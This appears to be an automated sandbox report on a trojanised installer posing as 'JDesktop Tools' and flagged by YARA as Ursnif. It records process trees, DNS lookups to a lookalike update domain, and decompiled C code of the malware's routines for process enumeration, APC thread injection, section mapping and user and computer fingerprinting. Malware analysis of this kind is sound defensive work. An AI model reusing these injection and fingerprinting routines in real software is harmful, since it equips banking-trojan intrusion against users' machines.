IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, QueryPerformanceCounter, QueryPerformanceFrequency, LCMapStringEx, GetSystemTimeAsFileTime, CompareStringEx, GetCPInfo, WaitForSingleObjectEx, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetFileType, GetTimeZoneInformation, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, IsValidCodePage, GetACP, GetOEMCP, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2021 JDesktop Integration Components (JDIC) Project
InternalName	plcd-player
FileVersion	3.4.0.2
CompanyName	JDesktop Integration Components (JDIC) Project
ProductName	JDesktop Tools
ProductVersion	3.4.0.2
FileDescription	JDesktop Tools Installer
OriginalFileName	plcd-player.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 13:51:32.522811890 CET	50781	53	192.168.2.7	8.8.8.8
Nov 25, 2021 13:51:32.603698969 CET	53	50781	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 13:51:32.522811890 CET	192.168.2.7	8.8.8.8	0x41f2	Standard query (0)	get.updates.avast.cn	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 25, 2021 13:51:04.875520945 CET	8.8.8.8	192.168.2.7	0x9886	No error (0)	windowsupdate.s.llnwi.net		178.79.225.128	A (IP address)	IN (0x0001)
Nov 25, 2021 13:51:04.875520945 CET	8.8.8.8	192.168.2.7	0x9886	No error (0)	windowsupdate.s.llnwi.net		95.140.230.128	A (IP address)	IN (0x0001)
Nov 25, 2021 13:51:04.969217062 CET	8.8.8.8	192.168.2.7	0x5864	No error (0)	windowsupdate.s.llnwi.net		95.140.230.128	A (IP address)	IN (0x0001)
Nov 25, 2021 13:51:04.969217062 CET	8.8.8.8	192.168.2.7	0x5864	No error (0)	windowsupdate.s.llnwi.net		178.79.225.0	A (IP address)	IN (0x0001)
Nov 25, 2021 13:51:32.603698969 CET	8.8.8.8	192.168.2.7	0x41f2	Name error (3)	get.updates.avast.cn	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: jXzrIReInY.exe PID: 7000 Parent PID: 4732

General

Start time:	13:50:21
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\jXzrIReInY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jXzrIReInY.exe"
Imagebase:	0x2b0000
File size:	7840296 bytes
MD5 hash:	4EC77EB8280485764B6BC22F6CF7D57E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: msiexec.exe PID: 4360 Parent PID: 560

General

Start time:	13:50:27
Start date:	25/11/2021
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff73a390000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 4344 Parent PID: 4360

General

Start time:	13:50:28
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding C5EB72BDE2B80B60A07F51ECA26339C7 C
Imagebase:	0xef0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6512 Parent PID: 7000

General

Start time:	13:50:29
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\jXzrIReInY.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1637876902 " AI_EUIMSI="
Imagebase:	0xef0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 4852 Parent PID: 4360

General

Start time:	13:50:33
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 54779E8B78CD501470CD2E1995D98D79
Imagebase:	0xef0000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: plcd-player.exe PID: 6620 Parent PID: 4360

General

Start time:	13:51:00
Start date:	25/11/2021
Path:	C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe
Imagebase:	0x1a0000
File size:	3768184 bytes
MD5 hash:	25DDBD309BB8094229704383977C7268
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000011.00000002.530777240.00000000035F9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000011.00000002.530869037.0000000003BA8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: jXzrIReInY.exe PID: 7000 Parent PID: 4732 jXzrIReInY.exeCOMMON

Executed Functions

Non-executed Functions

Function 03BC579B, Relevance: 2.0, Strings: 1, Instructions: 717COMMON

Download Yara Rule

Strings

$, xrefs: 03BC5E13

Memory Dump Source

Source File: 00000000.00000003.304179306.0000000003BC4000.00000004.00000001.sdmp, Offset: 03BC4000, based on PE: false

Similarity

API ID:
String ID: $
API String ID: 0-204604283
Opcode ID: c559b2be202407d8cf40c629b143ffb5662587d71202f2411c3b2bb3fb783e1c
Instruction ID: 4fd0dcf1418552f73f38d9c78fa47a8d265bedab3736485d8127a012c08bdf69
Opcode Fuzzy Hash: c559b2be202407d8cf40c629b143ffb5662587d71202f2411c3b2bb3fb783e1c
Instruction Fuzzy Hash: AB52A66288E3D14FC7238BB48C75595BFB06E13114B0E82DBC8C4CF5A3E259AA59C363

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: plcd-player.exe PID: 6620 Parent PID: 4360 plcd-player.exeCOMMON

Executed Functions

Function 001A19A0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 140
threadsleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E001A19A0() {
				long _v8;
				long _v12;
				long _v16;
				void* _v40;
				void* __edi;
				long _t31;
				long _t33;
				long _t34;
				void* _t37;
				long _t40;
				long _t41;
				long _t45;
				void* _t48;
				struct _SECURITY_ATTRIBUTES* _t50;
				signed int _t54;
				signed int _t55;
				struct _SECURITY_ATTRIBUTES* _t59;
				long _t61;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t71;
				signed int _t72;
				void* _t75;
				intOrPtr* _t76;

				_t31 = E001A1752();
				_t59 = 0;
				_v8 = _t31;
				if(_t31 != 0) {
					return _t31;
				}
				do {
					_t71 = 0;
					_v16 = _t59;
					_v12 = 0x30;
					do {
						_t66 = E001A16EE(_v12);
						if(_t66 == _t59) {
							_v8 = 8;
						} else {
							_t54 = NtQuerySystemInformation(8, _t66, _v12,  &_v16); // executed
							_t62 = _t54;
							_t55 = _t54 & 0x0000ffff;
							_v8 = _t55;
							if(_t55 == 4) {
								_v12 = _v12 + 0x30;
							}
							_t72 = 0x13;
							_t15 = _t62 + 1; // 0x1
							_t71 =  *_t66 % _t72 + _t15;
							E001A17CB(_t66);
						}
					} while (_v8 != _t59);
					_t33 = E001A14AD(_t66, _t71); // executed
					_v8 = _t33;
					Sleep(_t71 << 4); // executed
					_t34 = _v8;
				} while (_t34 == 9);
				if(_t34 != _t59) {
					L28:
					return _t34;
				}
				if(E001A17E0(_t62,  &_v12) != 0) {
					 *0x1a30f8 = _t59;
					L18:
					_t37 = CreateThread(_t59, _t59, __imp__SleepEx,  *0x1a3100, _t59, _t59); // executed
					_t75 = _t37;
					if(_t75 == _t59) {
						L25:
						_v8 = GetLastError();
						L26:
						_t34 = _v8;
						if(_t34 == 0xffffffff) {
							_t34 = GetLastError();
						}
						goto L28;
					}
					_t40 = QueueUserAPC(E001A13C4, _t75,  &_v40); // executed
					if(_t40 == 0) {
						_t45 = GetLastError();
						_v16 = _t45;
						TerminateThread(_t75, _t45);
						CloseHandle(_t75);
						_t75 = 0;
						SetLastError(_v16);
					}
					if(_t75 == 0) {
						goto L25;
					} else {
						_t41 = WaitForSingleObject(_t75, 0xffffffff);
						_v8 = _t41;
						if(_t41 == 0) {
							GetExitCodeThread(_t75,  &_v8);
						}
						CloseHandle(_t75);
						goto L26;
					}
				}
				_t76 = __imp__GetLongPathNameW;
				_t61 = _v12;
				_t48 =  *_t76(_t61, _t59, _t59); // executed
				_t69 = _t48;
				if(_t69 == 0) {
					L15:
					 *0x1a30f8 = _t61;
					L16:
					_t59 = 0;
					goto L18;
				}
				_t23 = _t69 + 2; // 0x2
				_t50 = E001A16EE(_t69 + _t23);
				 *0x1a30f8 = _t50;
				if(_t50 == 0) {
					goto L15;
				}
				 *_t76(_t61, _t50, _t69); // executed
				E001A17CB(_t61);
				goto L16;
			}

0x001a19a7
0x001a19ac
0x001a19ae
0x001a19b3
0x001a1b1b
0x001a1b1b
0x001a19bb
0x001a19bb
0x001a19bd
0x001a19c0
0x001a19c7
0x001a19cf
0x001a19d3
0x001a1a0d
0x001a19d5
0x001a19df
0x001a19e5
0x001a19e7
0x001a19ec
0x001a19f2
0x001a19f4
0x001a19f4
0x001a19fc
0x001a1a02
0x001a1a02
0x001a1a06
0x001a1a06
0x001a1a14
0x001a1a1a
0x001a1a23
0x001a1a26
0x001a1a2c
0x001a1a2f
0x001a1a36
0x001a1b17
0x00000000
0x001a1b18
0x001a1a47
0x001a1a87
0x001a1a8d
0x001a1a9d
0x001a1aa3
0x001a1aad
0x001a1b08
0x001a1b0a
0x001a1b0d
0x001a1b0d
0x001a1b13
0x001a1b15
0x001a1b15
0x00000000
0x001a1b13
0x001a1ab9
0x001a1ac7
0x001a1ac9
0x001a1acd
0x001a1ad0
0x001a1ad7
0x001a1adc
0x001a1ade
0x001a1ade
0x001a1ae6
0x00000000
0x001a1ae8
0x001a1aeb
0x001a1af1
0x001a1af6
0x001a1afd
0x001a1afd
0x001a1b04
0x00000000
0x001a1b04
0x001a1ae6
0x001a1a49
0x001a1a51
0x001a1a55
0x001a1a57
0x001a1a5b
0x001a1a7d
0x001a1a7d
0x001a1a83
0x001a1a83
0x00000000
0x001a1a83
0x001a1a5d
0x001a1a62
0x001a1a67
0x001a1a6e
0x00000000
0x00000000
0x001a1a73
0x001a1a76
0x00000000

APIs

Part of subcall function 001A1752: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,001A19AC), ref: 001A1761
Part of subcall function 001A1752: GetVersion.KERNEL32 ref: 001A1770
Part of subcall function 001A1752: GetCurrentProcessId.KERNEL32 ref: 001A178C
Part of subcall function 001A1752: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001A17A5

Part of subcall function 001A16EE: HeapAlloc.KERNEL32(00000000,?,001A19CF,00000030,?,00000000), ref: 001A16FA

NtQuerySystemInformation.NTDLL ref: 001A19DF
Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 001A1A26
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 001A1A55
GetLongPathNameW.KERNEL32(00000030,00000000,00000000), ref: 001A1A73
CreateThread.KERNEL32 ref: 001A1A9D
QueueUserAPC.KERNEL32(001A13C4,00000000,?,?,00000000), ref: 001A1AB9
GetLastError.KERNEL32(?,00000000), ref: 001A1AC9
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 001A1AD0
CloseHandle.KERNEL32(00000000,?,00000000), ref: 001A1AD7
SetLastError.KERNEL32(?,?,00000000), ref: 001A1ADE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 001A1AEB
GetExitCodeThread.KERNEL32(00000000,00000008,?,00000000), ref: 001A1AFD
CloseHandle.KERNEL32(00000000,?,00000000), ref: 001A1B04
GetLastError.KERNEL32(?,00000000), ref: 001A1B08
GetLastError.KERNEL32(?,00000000), ref: 001A1B15

Strings

0, xrefs: 001A19F4

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Thread$CloseCreateHandleLongNamePathProcess$AllocCodeCurrentEventExitHeapInformationObjectOpenQueryQueueSingleSleepSystemTerminateUserVersionWait
String ID: 0
API String ID: 2806485730-4108050209
Opcode ID: f039a37e20787cfc1701bf349bb7b317ca4093bde6d66807dc1c93d6fc0026d7
Instruction ID: 91133c6316ef00747ef597d0c55eec05c44abab0fddacd78d72b0fef992eb776
Opcode Fuzzy Hash: f039a37e20787cfc1701bf349bb7b317ca4093bde6d66807dc1c93d6fc0026d7
Instruction Fuzzy Hash: F8419DB9D01219BBCB11AFB98D84DAEBABCAF0B314F114165F515E3150E7348E80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1E22, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E001A1E22(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L001A1F3A();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x1a3104;
				_push(_t15 + 0x1a405e);
				_push(_t15 + 0x1a4054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L001A1F34();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x1a3108, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x001a1e22
0x001a1e2b
0x001a1e2f
0x001a1e35
0x001a1e3a
0x001a1e3f
0x001a1e42
0x001a1e45
0x001a1e4a
0x001a1e4b
0x001a1e4e
0x001a1e59
0x001a1e60
0x001a1e64
0x001a1e66
0x001a1e67
0x001a1e6a
0x001a1e6f
0x001a1e79
0x001a1e7b
0x001a1e7b
0x001a1e8f
0x001a1e95
0x001a1e99
0x001a1ee9
0x001a1e9b
0x001a1ea4
0x001a1eba
0x001a1ec2
0x001a1ed4
0x001a1ed8
0x00000000
0x00000000
0x001a1ec4
0x001a1ec7
0x001a1ecc
0x001a1ece
0x001a1ece
0x001a1eaf
0x001a1eb1
0x001a1eda
0x001a1edb
0x001a1edb
0x001a1ea4
0x001a1ef1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,001A143D,0000000A,?,?), ref: 001A1E2F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001A1E45
_snwprintf.NTDLL ref: 001A1E6A
CreateFileMappingW.KERNELBASE(000000FF,001A3108,00000004,00000000,?,?), ref: 001A1E8F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001A143D,0000000A,?), ref: 001A1EA6
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 001A1EBA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001A143D,0000000A,?), ref: 001A1ED2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,001A143D,0000000A), ref: 001A1EDB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001A143D,0000000A,?), ref: 001A1EE3

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.525835370.00000000001A4000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.525846743.00000000001A6000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: b39fa9a031e38fe8c1d2a75ea0c221de191e45d416bc487275dec4f238fbe0d5
Instruction ID: 5d6e09ddd420ec56d513f901a72235e7cdec0be67161f941b15015bbcca0b6e8
Opcode Fuzzy Hash: b39fa9a031e38fe8c1d2a75ea0c221de191e45d416bc487275dec4f238fbe0d5
Instruction Fuzzy Hash: 952192B6A00108BFC712AFA8DD84EEE7BA9EB5A354F254025FA16D7190D7709D44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02CE7A2E, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02CE7A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2ced270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02CE4F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2ced2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2ced238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02CE2C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0x2ced238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2ced238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02CE2C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0x2ced238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02ce7a2e
0x02ce7a36
0x02ce7a3a
0x02ce7a3d
0x02ce7a42
0x02ce7a44
0x02ce7a49
0x02ce7a49
0x02ce7a4f
0x02ce7a51
0x02ce7a5e
0x02ce7abf
0x02ce7a60
0x02ce7a65
0x02ce7a6b
0x02ce7a70
0x02ce7a7e
0x02ce7a82
0x02ce7a91
0x02ce7a98
0x02ce7a9f
0x02ce7a9f
0x02ce7aaa
0x02ce7aaa
0x02ce7a82
0x02ce7a70
0x02ce7ac1
0x02ce7ac7
0x02ce7ad1
0x02ce7ad3
0x02ce7ad8
0x02ce7ae7
0x02ce7aeb
0x02ce7af6
0x02ce7afd
0x02ce7b04
0x02ce7b04
0x02ce7b10
0x02ce7b10
0x02ce7aeb
0x02ce7b1b
0x02ce7b1d
0x02ce7b20
0x02ce7b22
0x02ce7b25
0x02ce7b28
0x02ce7b32
0x02ce7b36
0x02ce7b3a

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02CE7A65
RtlAllocateHeap.NTDLL(00000000,?), ref: 02CE7A7C
GetUserNameW.ADVAPI32(00000000,?), ref: 02CE7A89
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02CE30EE), ref: 02CE7AAA
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02CE7AD1
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02CE7AE5
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02CE7AF2
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02CE30EE), ref: 02CE7B10

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 92a12b5cd0aa7e729d577e7f550ecf75b8da4b3e9743faa597701b66648f929e
Instruction ID: 3b8265d881bf11ba862c1e29a8aa1802f11bffa6a841417e5fd2ab6ab300e944
Opcode Fuzzy Hash: 92a12b5cd0aa7e729d577e7f550ecf75b8da4b3e9743faa597701b66648f929e
Instruction Fuzzy Hash: D4311772A40205EFDF10DFA9CC80B6EF7FDEB88204B154969E506DB210EB30EE159B50

Uniqueness

Uniqueness Score: -1.00%

Function 02CE9A0F, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02CE9A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02CE1525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02CE8B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02ce9a1c
0x02ce9a1d
0x02ce9a1e
0x02ce9a1f
0x02ce9a20
0x02ce9a24
0x02ce9a2b
0x02ce9a3a
0x02ce9a3d
0x02ce9a40
0x02ce9a47
0x02ce9a4a
0x02ce9a4d
0x02ce9a50
0x02ce9a53
0x02ce9a5e
0x02ce9a60
0x02ce9a69
0x02ce9a71
0x02ce9a73
0x02ce9a85
0x02ce9a8f
0x02ce9a93
0x02ce9aa2
0x02ce9aa6
0x02ce9aaf
0x02ce9ab7
0x02ce9ab7
0x02ce9ab9
0x02ce9ab9
0x02ce9ac1
0x02ce9ac7
0x02ce9acb
0x02ce9acb
0x02ce9ad6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02CE9A56
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02CE9A69
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02CE9A85

Part of subcall function 02CE1525: RtlAllocateHeap.NTDLL(00000000,00000000,02CE1278), ref: 02CE1531

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02CE9AA2
memcpy.NTDLL(00000000,00000000,0000001C), ref: 02CE9AAF
NtClose.NTDLL(?), ref: 02CE9AC1
NtClose.NTDLL(00000000), ref: 02CE9ACB

Memory Dump Source

Source File: 00000011.00000002.529940632.0000000002CE1000.00000020.00020000.sdmp, Offset: 02CE0000, based on PE: true

Associated: 00000011.00000002.529881396.0000000002CE0000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530095614.0000000002CEC000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.530191336.0000000002CED000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.530233997.0000000002CEF000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: a8f385a4fdc28a985bd3092f7d4b27b42a9922d6f31fd5587b27b46cc836212f
Instruction ID: cb227327b8726c69c7c97b6ffa6d608721509bb0e6df372a7f9d61bf25bffc65
Opcode Fuzzy Hash: a8f385a4fdc28a985bd3092f7d4b27b42a9922d6f31fd5587b27b46cc836212f
Instruction Fuzzy Hash: 5F21F4B2980218EFDF019FA5DC45ADEBFBDEF08744F108122F906EA110D7719B549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E001A1C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E001A1703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x001a1c99
0x001a1ca0
0x001a1ca1
0x001a1ca2
0x001a1ca3
0x001a1ca4
0x001a1cb5
0x001a1cb9
0x001a1ccd
0x001a1cd0
0x001a1cd3
0x001a1cda
0x001a1cdd
0x001a1ce4
0x001a1ce7
0x001a1cea
0x001a1ced
0x001a1cf2
0x001a1d2d
0x001a1cf4
0x001a1cf7
0x001a1cfd
0x001a1d02
0x001a1d06
0x001a1d24
0x001a1d08
0x001a1d0f
0x001a1d1d
0x001a1d1d
0x001a1d06
0x001a1d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,?), ref: 001A1CED

Part of subcall function 001A1703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,001A1D02,00000002,00000000,?,?,00000000,?,?,001A1D02,00000002), ref: 001A1730

memset.NTDLL ref: 001A1D0F

Strings

@, xrefs: 001A1CDD

Memory Dump Source

Source File: 00000011.00000002.525816570.00000000001A1000.00000040.00020000.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000011.00000002.525798200.00000000001A0000.00000002.00020000.sdmp Download File
